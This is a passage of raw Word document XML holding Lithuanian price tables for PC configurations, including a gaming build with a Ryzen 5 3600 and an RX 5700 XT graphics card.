              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>134</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="6AFEEEE7" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r w:rsidR="2C653F4D" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="0E6ED300" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3C12105F" w14:textId="6C7E4151" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Klavviatūra + pelė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6B6C91DB" w14:textId="59A8FAB6" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="41364CD7" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Logitech keyboard MK120</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="53C80B38" w14:textId="61561736" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="32DF8E5C" w14:textId="13EBAE82" w:rsidR="5EA9727F" w:rsidRPr="005A5C28" w:rsidRDefault="5EA9727F" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="7C97AB73" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r w:rsidR="2C653F4D" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w14:paraId="180CFD96" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="36A6FBF9" w14:textId="60628F4E" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>IŠ VISO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6C8677E2" w14:textId="4FA0D45C" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="03FF993E" w14:textId="44E53BB4" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2FBA908F" w14:textId="26025499" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="37621CCA" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>600</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="2DEF2A67" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r w:rsidR="106645CB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="696D870D" w14:textId="2BBBA7FE" w:rsidR="00FE41AD" w:rsidRPr="005A5C28" w:rsidRDefault="00FE41AD" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09108573" w14:textId="2BBBA7FE" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="1EA8E69B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Antras variantas skirtas žaidėjams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6B3991" w14:textId="2BBBA7FE" w:rsidR="00621A64" w:rsidRPr="005A5C28" w:rsidRDefault="00621A64" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5001" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="5012"/>
        <w:gridCol w:w="886"/>
        <w:gridCol w:w="1495"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="793DB22F" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="26963E6F" w14:textId="66834493" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Prekės pavadinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="186F50DA" w14:textId="21C03B97" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Prekės modelis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7B7B2AFF" w14:textId="1495E088" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vnt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7D456749" w14:textId="4FC59D4F" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kaina 1 vnt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7695DB8D" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3A412611" w14:textId="14989C0E" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Procesorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="50B5D433" w14:textId="1DF33728" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>AMD Ryzen 5 3600, 6C/12T, 4.2 GHz, 36 MB, AM4, 65W, 7nm, BOX (su aušintuvu dėžutėje)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1E1300E0" w14:textId="243F13CC" w:rsidR="400DD2DA" w:rsidRPr="005A5C28" w:rsidRDefault="400DD2DA" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="44111E8E" w14:textId="37EC8CD9" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>209</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>90€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="67E58FE5" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="035145D8" w14:textId="2E3D299E" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Pagrindinė plokštė </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="37949488" w14:textId="5A77067D" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">GIGABYTE B550M DS3H AM4 DDR4 2xM.2 4xSATA DVI-D HDMI mATX </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4FA2F720" w14:textId="459AB5D7" w:rsidR="24B6957A" w:rsidRPr="005A5C28" w:rsidRDefault="24B6957A" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3AAD7C0A" w14:textId="79598D4B" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>29 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="29D567A8" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5995CA09" w14:textId="55C1E80E" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operatyvinė atmintis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="41F0AAB2" w14:textId="0D8BB8A2" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>KINGSTON 16GB 3600MHz DDR4 CL17 DIMM Kit of 2 1Rx8 HyperX FURY Black</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="11CDD314" w14:textId="00F0D6C2" w:rsidR="309081D0" w:rsidRPr="005A5C28" w:rsidRDefault="309081D0" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="63C70FBD" w14:textId="7F239542" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>79 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3FC36838" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="209B8E33" w14:textId="440C903B" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vaizdo plokštė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="085291EB" w14:textId="04681982" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>GIGABYTE Radeon AMD RX 5700 XT GAMING OC 8GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="33BD9770" w14:textId="5DDCD837" w:rsidR="013194C2" w:rsidRPr="005A5C28" w:rsidRDefault="013194C2" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
